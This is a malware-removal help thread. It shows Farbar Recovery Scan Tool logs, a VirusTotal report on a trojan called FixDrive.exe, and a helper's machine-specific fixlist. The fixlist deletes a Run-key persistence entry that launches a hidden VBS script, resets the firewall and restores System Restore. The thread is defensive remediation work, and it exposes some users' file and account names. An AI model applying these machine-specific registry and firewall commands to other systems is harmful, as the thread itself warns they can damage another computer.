2016-08-21 09:53 - 2016-08-21 09:53 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-08-21 09:53 - 2016-03-10 14:09 - 00064896 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2016-08-21 09:53 - 2016-03-10 14:08 - 00140672 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2016-08-21 09:53 - 2016-03-10 14:08 - 00027008 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2016-08-21 09:51 - 2016-08-21 09:52 - 05200384 _____ (AVAST Software) C:\Users\Administrator\Downloads\aswmbr.exe
2016-08-21 09:51 - 2016-08-21 09:52 - 02856736 _____ (MyCity) C:\Users\Administrator\Downloads\MCShield-Setup.exe
2016-08-21 09:51 - 2016-08-21 09:52 - 02396160 _____ (Farbar) C:\Users\Administrator\Downloads\FRST64.exe
2016-08-21 09:50 - 2016-08-21 09:53 - 22851472 _____ (Malwarebytes ) C:\Users\Administrator\Downloads\mbam-setup-2.2.1.1043.exe
2016-08-21 09:45 - 2016-08-21 09:45 - 00000000 ____D C:\WINDOWS\system32\appmgmt
2016-08-21 09:30 - 2016-08-21 09:30 - 00000000 ____D C:\Users\thabas\Downloads\FixDrive2
2016-08-21 09:30 - 2016-08-21 09:30 - 00000000 ____D C:\Users\thabas\Downloads\FixDrive
2016-08-21 09:29 - 2016-08-21 09:29 - 00008831 _____ C:\Users\thabas\Downloads\FixDrive2.rar
2016-08-21 09:29 - 2016-08-21 09:29 - 00008831 _____ C:\Users\thabas\Downloads\FixDrive.rar
2016-08-21 09:26 - 2016-08-21 09:26 - 00100504 _____ C:\Users\thabas\AppData\Local\GDIPFONTCACHEV1.DAT
2016-08-21 09:25 - 2016-08-21 09:25 - 00000000 ____D C:\Users\thabas\AppData\Local\Hewlett-Packard_Developme
2016-08-20 13:27 - 2016-08-20 13:27 - 00000000 ____D C:\Users\thabas\AppData\Roaming\SAP
2016-08-19 20:23 - 2016-08-19 20:23 - 00000000 ____D C:\Users\thabas\AppData\Local\ESET
2016-08-19 19:55 - 2016-08-19 19:55 - 00001413 _____ C:\Users\thabas\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2016-08-19 19:55 - 2016-08-19 19:55 - 00001379 _____ C:\Users\thabas\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk
2016-08-19 19:55 - 2016-08-19 19:55 - 00000000 ____D C:\Users\thabas\AppData\Roaming\vlc
2016-08-19 19:55 - 2016-08-19 19:55 - 00000000 ____D C:\Users\thabas\AppData\Roaming\Synaptics
2016-08-19 19:55 - 2016-08-19 19:55 - 00000000 ____D C:\Users\thabas\AppData\LocalLow\Sun
2016-08-19 19:55 - 2016-08-19 19:55 - 00000000 ____D C:\Users\thabas\AppData\LocalLow\Apple Computer
2016-08-19 19:55 - 2016-08-19 19:55 - 00000000 ____D C:\Users\thabas\AppData\Local\Google
2016-08-19 19:53 - 2016-08-19 19:53 - 00000000 ____D C:\Users\thabas\AppData\Roaming\CheckPoint
2016-08-19 19:52 - 2016-08-19 19:52 - 00111568 __RSH C:\Users\thabas\ntuser.pol
2016-08-19 19:51 - 2016-08-21 09:25 - 00000000 ____D C:\Users\thabas\AppData\Roaming\Hewlett-Packard
2016-08-19 19:51 - 2016-08-19 19:55 - 00000000 ____D C:\Users\thabas\AppData\Roaming\ICAClient
2016-08-19 19:51 - 2016-08-19 19:55 - 00000000 ____D C:\Users\thabas
2016-08-19 19:51 - 2016-08-19 19:51 - 00000020 ___SH C:\Users\thabas\ntuser.ini
2016-08-19 19:51 - 2016-08-19 19:51 - 00000000 _SHDL C:\Users\thabas\My Documents
2016-08-19 19:51 - 2016-08-19 19:51 - 00000000 _SHDL C:\Users\thabas\Documents\My Videos
2016-08-19 19:51 - 2016-08-19 19:51 - 00000000 _SHDL C:\Users\thabas\Documents\My Pictures
2016-08-19 19:51 - 2016-08-19 19:51 - 00000000 _SHDL C:\Users\thabas\Documents\My Music
2016-08-19 19:51 - 2016-05-23 10:52 - 00000000 ____D C:\Users\thabas\AppData\Roaming\Sun
2016-08-19 19:51 - 2014-11-24 10:48 - 00001189 _____ C:\Users\thabas\Desktop\Show Printers - Johannesburg.lnk
2016-08-19 19:51 - 2014-11-24 10:02 - 00000000 ____D C:\Users\thabas\AppData\Roaming\hpqLog
2016-08-19 19:51 - 2014-11-24 10:01 - 00002256 _____ C:\Users\thabas\Desktop\HP Connection Manager.lnk
2016-08-19 19:51 - 2013-05-07 12:59 - 00001610 _____ C:\Users\thabas\Desktop\Snipping Tool Plus.lnk
2016-08-19 19:51 - 2012-11-20 13:57 - 00000963 _____ C:\Users\thabas\Desktop\NetWeaver Business Client 3.5.lnk
2016-08-19 19:51 - 2012-08-28 15:28 - 00001649 _____ C:\Users\thabas\Desktop\SAP Logon.lnk
2016-08-19 19:51 - 2012-03-02 08:51 - 00000675 _____ C:\Users\thabas\Desktop\Mount networkdrives.cmd
2016-08-19 19:51 - 2012-02-29 19:33 - 00001772 _____ C:\Users\thabas\Desktop\Internet Explorer.lnk
2016-08-19 19:51 - 2012-02-29 19:33 - 00001494 _____ C:\Users\thabas\Desktop\Explorer.lnk
2016-08-19 19:51 - 2012-02-29 19:21 - 00000000 ____D C:\Users\thabas\AppData\Local\ABBYY
2016-08-19 19:51 - 2012-02-29 19:18 - 00000000 ____D C:\Users\thabas\AppData\Local\Citrix
2016-08-19 19:51 - 2012-02-29 19:15 - 00000940 _____ C:\Users\thabas\Desktop\CDB Desktop 9.8.lnk
2016-08-19 19:51 - 2012-02-29 18:57 - 00001949 _____ C:\Users\thabas\Desktop\Lotus Notes 8.5 (Network).lnk
2016-08-19 19:51 - 2012-02-29 18:57 - 00001949 _____ C:\Users\thabas\Desktop\Lotus Notes 8.5 (Local).lnk
2016-08-19 19:51 - 2012-02-29 18:17 - 00002621 _____ C:\Users\thabas\Desktop\Microsoft Word 2010.lnk
2016-08-19 19:51 - 2012-02-29 18:17 - 00002621 _____ C:\Users\thabas\Desktop\Microsoft PowerPoint 2010.lnk
2016-08-19 19:51 - 2012-02-29 18:17 - 00002621 _____ C:\Users\thabas\Desktop\Microsoft Excel 2010.lnk
2016-08-19 19:51 - 2012-02-29 18:09 - 00000000 ____D C:\Users\thabas\AppData\Local\Microsoft Help
2016-08-19 19:51 - 2012-01-18 12:11 - 00000675 _____ C:\Users\thabas\Desktop\Laufwerke verbinden.cmd
2016-08-19 18:57 - 2016-08-19 18:57 - 00000000 ____D C:\Users\pietersw\AppData\Redirected
2016-08-19 18:57 - 2016-08-19 18:57 - 00000000 ____D C:\Users\pietersw
2016-08-19 13:27 - 2016-08-19 13:27 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\winsc32
2016-08-17 16:36 - 2016-08-17 16:52 - 00000000 ____D C:\Users\Administrator\AppData\Local\NPE
2016-08-17 16:36 - 2016-08-17 16:36 - 00000000 ____D C:\ProgramData\Norton
2016-08-01 15:56 - 2016-08-01 15:57 - 02432752 _____ C:\Users\ebrahimm\Downloads\Attachments_201681 (1).zip
2016-08-01 14:57 - 2016-08-01 14:57 - 04409703 _____ C:\Users\ebrahimm\Downloads\Mr M Ebrahim - August renewal 2016.pdf
2016-08-01 14:55 - 2016-08-01 14:55 - 09308687 _____ C:\Users\ebrahimm\Downloads\Attachments_201681.zip
2016-07-28 11:50 - 2016-07-28 11:50 - 00041203 _____ C:\Users\ebrahimm\Downloads\2017 admissions form (1).xlsx
2016-07-28 11:13 - 2016-06-26 02:35 - 00041704 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2016-07-28 11:13 - 2016-06-26 02:27 - 01208320 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2016-07-28 11:13 - 2016-06-26 02:27 - 00970240 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2016-07-28 11:13 - 2016-06-26 02:27 - 00756736 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll
2016-07-28 11:13 - 2016-06-26 02:27 - 00344576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntprint.dll
2016-07-28 11:13 - 2016-06-25 21:54 - 00497152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32spl.dll
2016-07-28 11:13 - 2016-06-25 21:53 - 00297472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntprint.dll
2016-07-28 11:13 - 2016-06-25 21:53 - 00061952 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntprint.exe
2016-07-28 11:13 - 2016-06-25 21:41 - 00061952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntprint.exe
2016-07-28 11:13 - 2016-06-22 15:06 - 00268800 _____ (Microsoft Corporation) C:\WINDOWS\system32\centel.dll
2016-07-28 11:13 - 2016-06-17 20:24 - 01490432 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2016-07-28 11:13 - 2016-06-17 20:24 - 00571904 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2016-07-28 11:13 - 2016-06-17 20:24 - 00544256 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2016-07-28 11:13 - 2016-06-17 20:24 - 00294912 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2016-07-28 11:13 - 2016-06-17 20:24 - 00219136 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
2016-07-28 11:13 - 2016-06-17 20:24 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2016-07-28 11:13 - 2016-06-14 17:03 - 03217408 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2016-07-27 14:45 - 2016-07-27 14:45 - 00041203 _____ C:\Users\ebrahimm\Downloads\2017 admissions form.xlsx
2016-07-26 17:01 - 2016-07-26 17:01 - 00287712 _____ C:\Users\ebrahimm\Downloads\00000005898460803382779 (5).pdf

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-08-21 09:45 - 2014-11-24 16:26 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\CheckPoint
2016-08-21 09:45 - 2014-11-24 11:20 - 00000000 ____D C:\Program Files (x86)\CheckPoint
2016-08-21 09:45 - 2009-07-14 05:20 - 00000000 ____D C:\WINDOWS\inf
2016-08-21 09:43 - 2016-02-02 11:16 - 00000894 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-08-21 09:36 - 2016-02-02 11:16 - 00000898 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-08-21 08:09 - 2009-07-14 06:45 - 00019088 ____H C:\WINDOWS\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2016-08-21 08:09 - 2009-07-14 06:45 - 00019088 ____H C:\WINDOWS\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2016-08-21 07:52 - 2011-05-18 23:26 - 00000416 _____ C:\WINDOWS\system32\config\netlogon.ftl
2016-08-20 18:04 - 2012-02-29 19:48 - 00065557 __RSH C:\ProgramData\ntuser.pol
2016-08-20 16:25 - 2011-04-11 11:07 - 00455324 _____ C:\WINDOWS\system32\perfh011.dat
2016-08-20 16:25 - 2011-04-11 11:07 - 00146312 _____ C:\WINDOWS\system32\perfc011.dat
2016-08-20 16:25 - 2011-04-11 11:03 - 00779652 _____ C:\WINDOWS\system32\perfh007.dat
2016-08-20 16:25 - 2011-04-11 11:03 - 00178916 _____ C:\WINDOWS\system32\perfc007.dat
2016-08-20 16:25 - 2009-07-14 07:13 - 02423356 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-08-20 16:18 - 2012-02-07 15:39 - 00000000 ____D C:\TEMP
2016-08-20 16:13 - 2011-05-18 14:29 - 00000405 _____ C:\WINDOWS\SMSCFG.INI
2016-08-20 16:10 - 2009-07-14 07:08 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-08-19 19:17 - 2009-07-14 06:57 - 00001547 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2016-08-19 13:29 - 2014-11-24 16:37 - 00100504 _____ C:\Users\Administrator\AppData\Local\GDIPFONTCACHEV1.DAT
2016-08-02 11:50 - 2014-12-09 09:31 - 00000000 ____D C:\Users\ebrahimm
2016-08-01 09:38 - 2009-07-14 06:45 - 00384128 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-07-29 12:02 - 2014-12-17 14:57 - 00000000 ____D C:\WINDOWS\system32\appraiser
2016-07-29 08:40 - 2016-02-02 11:18 - 00002161 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-07-29 08:40 - 2016-02-02 11:18 - 00002149 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-07-29 08:30 - 2016-02-02 11:16 - 00003894 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2016-07-29 08:30 - 2016-02-02 11:16 - 00003642 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2016-07-28 14:14 - 2014-12-09 09:32 - 00111180 __RSH C:\Users\ebrahimm\ntuser.pol

==================== Files in the root of some directories =======

2009-02-13 16:19 - 2009-02-13 16:19 - 0737280 _____ (InfoSlips) C:\Program Files (x86)\Common Files\InfoSlips.ForMe.exe
2014-11-24 16:26 - 2014-12-09 09:35 - 0001675 _____ () C:\Users\Administrator\AppData\Local\CPAUTO.tmp

Some zero byte size files/folders:

C:\Windows\SysWOW64\dlumd10.dll
C:\Windows\SysWOW64\dlumd11.dll
C:\Windows\SysWOW64\dlumd9.dll
C:\Windows\System32\dlumd10.dll
C:\Windows\System32\dlumd11.dll
C:\Windows\System32\dlumd9.dll

==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2016-08-17 13:47

==================== End of FRST.txt ============================

12

attach the logs from FRST

I also have the virus if you would like me to copy it.
Upload and scan the file at www.virustotal.com if scanned before, click rescan for a fresh result and post link to scan result here
13

HI,

Thank you for helping, the logs are more than 2000 characters so I had to split them.

14

That is why FRST logs should be attached

see below the box you write in > Attachments and other options

15

Virus total

Analysis

AegisLab Troj.Gen.Smh!c 20160821
Jiangmin TrojanDropper.Delf.foi 20160821
Symantec Trojan.Gen.SMH 20160821
TrendMicro-HouseCall TROJ_GEN.R08JH05HK16 20160821
ALYac 20160821
AVG 20160821
AVware 20160821
Ad-Aware 20160821
AhnLab-V3 20160820
Alibaba 20160819
Antiy-AVL 20160821
Arcabit 20160821
Avast 20160821
Avira (no cloud) 20160820
Baidu 20160820
BitDefender 20160821
Bkav 20160820
CAT-QuickHeal 20160820
CMC 20160818
ClamAV 20160821
Comodo 20160821
Cyren 20160821
DrWeb 20160821
ESET-NOD32 20160821
Emsisoft 20160821
F-Prot 20160821
F-Secure 20160821
Fortinet 20160821
GData 20160821
Ikarus 20160821
K7AntiVirus 20160821
K7GW 20160821
Kaspersky 20160821
Kingsoft 20160821
Malwarebytes 20160821
McAfee 20160821
McAfee-GW-Edition 20160820
eScan 20160821
Microsoft 20160821
NANO-Antivirus 20160821
Panda 20160821
Qihoo-360 20160821
Rising 20160821
SUPERAntiSpyware 20160821
Sophos 20160821
Tencent 20160821
TheHacker 20160817
TrendMicro 20160821
VBA32 20160819
VIPRE 20160821
ViRobot 20160820
Zillya 20160820
Zoner 20160821
nProtect None

File detail
Target machine Intel 386 or later processors and compatible processors
Compilation timestamp 1992-06-19 22:22:17
Entry Point 0x00003DFC
Number of sections 8
PE sections
Name Virtual address Virtual size Raw size Entropy MD5
CODE 4096 12064 12288 6.37 fcbc058569ca206552c654c94abf2c8d
DATA 16384 160 512 1.86 2e324267f6c61a3e82840c05968ac898
BSS 20480 1637 0 0.00 d41d8cd98f00b204e9800998ecf8427e
.idata 24576 966 1024 4.16 874f16b3120828d7117f4d58e058a5b7
.tls 28672 8 0 0.00 d41d8cd98f00b204e9800998ecf8427e
.rdata 32768 24 512 0.20 753527920e84ff25027979eeb2bca12a
.reloc 36864 800 1024 5.62 a240c07ab41704231e2a3a303aace3ec
.rsrc 40960 16 512 0.08 ca7be63846877fa481b02c3288f88ad1
PE imports
[+] advapi32.dll
[+] kernel32.dll
[+] shell32.dll
[+] user32.dll
ExifTool file metadata
MIMETypeapplication/octet-stream
SubsystemWindows GUI
MachineTypeIntel 386 or later, and compatibles
FileTypeExtensionexe
TimeStamp1992:06:19 23:22:17+01:00
FileTypeWin32 EXE
PETypePE32
CodeSize12288
LinkerVersion2.25
EntryPoint0x3dfc
InitializedDataSize3584
SubsystemVersion4.0
ImageVersion0.0
OSVersion4.0
UninitializedDataSize0

Additional info

MD5 c7141b586f3669c9468a4c95c0d4622e
SHA1 ce7b5c199e798af6229c26054dc7e35678e504af
SHA256 53ded0c3da41ecacb88815f781512995a1780697540966a9d9dda55f93aef392
ssdeep384:EezzZEeyI91y8N9Q+9tlWsSkqMk+Nmgz507+k:Vc8N9PNhFAg507p
authentihash 41c71f87b005fe7541c694ea9f403b9196bc9d12a0f4520cf3baa33268e29d3b
imphash f1160d135f828ca8cb598f8b55457f6d
File size 16.5 KB ( 16896 bytes )
File type Win32 EXE
Magic literalPE32 executable for MS Windows (GUI) Intel 80386 32-bit
TrID Win32 Dynamic Link Library (generic) (38.3%)
Win32 Executable (generic) (26.2%)
Win16/32 Executable Delphi generic (12.0%)
Generic Win/DOS Executable (11.6%)
DOS Executable Generic (11.6%)
Tagspeexe
VirusTotal metadata
First submission 2016-08-15 06:43:14 UTC ( 6 days, 2 hours ago )
Last submission 2016-08-21 09:35:32 UTC ( 5 minutes ago )
File names FixDrive.exe

16

FRST

17

as i said, post link to VT result.

There is lots of additional file info behind the extra tabs that we cant see when you copy and paste

Found it using MD5 search
https://virustotal.com/en/file/53ded0c3da41ecacb88815f781512995a1780697540966a9d9dda55f93aef392/analysis/

@dbrisendine will assit you when back online

18

Herewith the link

https://www.virustotal.com/en/file/53ded0c3da41ecacb88815f781512995a1780697540966a9d9dda55f93aef392/analysis/1471772132/

19

Is this a business machine that is part of a domain? Some of the settings may not be able to be changed except by the Domain Administrator.

FIRST >>>>

Did you know that System Restore is disabled?

If you did not do this intentionally, please check the following:

Go to Start and type System in the search box.

Click on System (under Control Panel or Settings) and then on System Protection.

Click on Configure and then select Turn on system protection.

Click Apply and then OK.

In the System Protection screen, is Protection now On for the drive?

SECOND >>>>

Please go to START (Windows Orb) >> Control Panel >> Uninstall a Program or Programs and Features and remove the following (if listed):

QuickTime

To do so, left clicking on the name once and then click Uninstall/Change at the bar above the list window.

Follow the prompts of the uninstaller BUT please read carefully any questions it asks before answering; some uninstallers will try and deceive you into keeping the software.

THIRD >>>>

Open notepad by pressing the Windows Key + R Key, typing in Notepad in the Run dialog and then pressing Enter. Please copy the contents of the Code box below. To do this highlight the contents of the box by clicking [Select] next to Code: , then right click on any of the highlighted text and select copy. Paste this into the open notepad. Save it to your desktop as fixlist.txt


Start
CreateRestorePoint:
CloseProcesses:
HKLM\...\Run: [b] => wscript.exe //B "C:\Users\ADMINI~1\AppData\Roaming\winsc32\b.vbs"
C:\Users\ADMINI~1\AppData\Roaming\winsc32
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Infoclient] => [X]
HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore: [DisableSR/DisableConfig]  <===== ATTENTION
HKU\S-1-5-21-3459921781-3051252704-3355898513-500\...\Run: [b] => wscript.exe //B "C:\Users\ADMINI~1\AppData\Roaming\winsc32\b.vbs"
Startup: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update Explorer.lnk [2016-08-21]
BHO-x32: No Name -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> No File
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll => No File
Toolbar: HKU\S-1-5-21-3459921781-3051252704-3355898513-500 -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
CHR Extension: (Google Search) - C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-02-02]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-08-21]
S3 e1express; system32\DRIVERS\e1e6232e.sys [X]
S3 e1yexpress; system32\DRIVERS\e1y62x64.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
C:\Windows\system32\DRIVERS\e1e6232e.sys
C:\Windows\system32\DRIVERS\e1y62x64.sys
C:\Windows\System32\drivers\rdvgkmd.sys
cmd: ipconfig /flushdns
cmd: netsh advfirewall reset
cmd: netsh advfirewall set allprofiles state on
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
CMD: bitsadmin /reset /allusers
RemoveProxy:
EmptyTemp:
Reboot:
end

NOTE. It’s important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Run FRST64 by right clicking on the FRST64.exe file, selecting “Run as Administrator…”. The User Account Control may open up; if it does, select Yes to continue to let FRST open and load.

The tool will check for an updated version of itself every time it loads; please allow it to do this and the program will either inform you it is downloading an updated copy (and to wait until it is safe to continue) or show nothing (meaning there is no update found) and you can continue on. Press the Fix button just once and wait. The tool will create a restore point, process the script and ask for a restart of your system.

http://i1351.photobucket.com/albums/p785/dbreeze2/just%20stuff/Press%20the%20FIX%20button_zpsdd5zi3mt.png

If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.

When finished FRST will generate a log on the Desktop (Fixlog.txt). Please attach it to your reply post. Also, tell me how your system is running now.